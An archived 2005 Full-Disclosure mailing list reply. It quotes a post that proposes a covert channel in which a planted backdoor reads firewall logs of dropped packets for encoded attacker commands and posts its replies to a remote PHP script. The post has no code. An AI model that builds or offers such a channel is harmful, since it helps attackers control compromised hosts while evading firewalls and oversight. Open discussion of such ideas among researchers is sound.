[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?

To: PASTOR ADRIAN <M123303@xxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Interesting idea for a covert channel or I justdidn't research enough?
From: phased <phased@xxxxxxx>
Date: Thu, 06 Oct 2005 16:30:06 +0400

bit noisy i think

-----Original Message-----
From: "PASTOR ADRIAN" <M123303@xxxxxxxxxxxxxx>
To: <full-disclosure@xxxxxxxxxxxxxxxxx>
Date: Thu, 6 Oct 2005 10:06:24 +0100
Subject: [Full-disclosure] Interesting idea for a covert channel or I 
justdidn't research enough?

> Sometime ago I thought of the following idea for a covert channel. Although 
> the idea of covert channels is *not* new at all, I couldn't find anything in 
> Google related to the following method of implementing a covert channel.
>  
> The scenario is the following. The victim is a host with a host-level 
> firewall which is blocking *all* incoming traffic. Somehow the attacker still 
> needs to communicate with a backdoor planted in this host. Use a reverse 
> shell and job done, you might say.
> 
> Actually, there is another way which I thought would be more creative (IMHO). 
>  
> It works like this: the backdoor enables logging in the host-level firewall 
> for all dropped packets, say Windows XP SP2 Firewall. Then the backdoor 
> receives commands from the attacker by interpreting the properties of the 
> dropped packets which were logged by the firewall. In other words, the 
> backdoor is constantly reading the logs and parsing commands which were sent 
> by the attacker embedded in packets which are being dropped (but logged) by 
> the firewall.
> 
> attacker sends packets -> packets are dropped by firewall -> packets 
> properties are captured in logs  -> backdoor reads logs and finds encoded 
> commands -> commands are executed 
> 
> Now, for the way the backdoor would reply back to the victim is really up to 
> you. One method that comes to my mind is by posting the responses to a PHP 
> script which is located in some free-hosting webpage. The attacker would then 
> access this webpage.
>  
> Please, if you know anything related to backdoors intercepting commands from 
> log files send me some links. Ideas, comments and flames are more than 
> welcome :-) .
> 
> Regards,
> pagvac (Adrian Pastor)
> Earth, SOLAR SYSTEM
> www.adrianpv.com
> www.ikwt.com (In Knowledge We Trust)
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?
  - From: PASTOR ADRIAN

Prev by Date: [Full-disclosure] Secunia Research: PHP-Fusion Two SQL Injection Vulnerabilities
Next by Date: Re: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?
Previous by thread: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?
Next by thread: Re: [Full-disclosure] Interesting idea for a covert channel or I just didn't research enough?
Index(es):
- Date
- Thread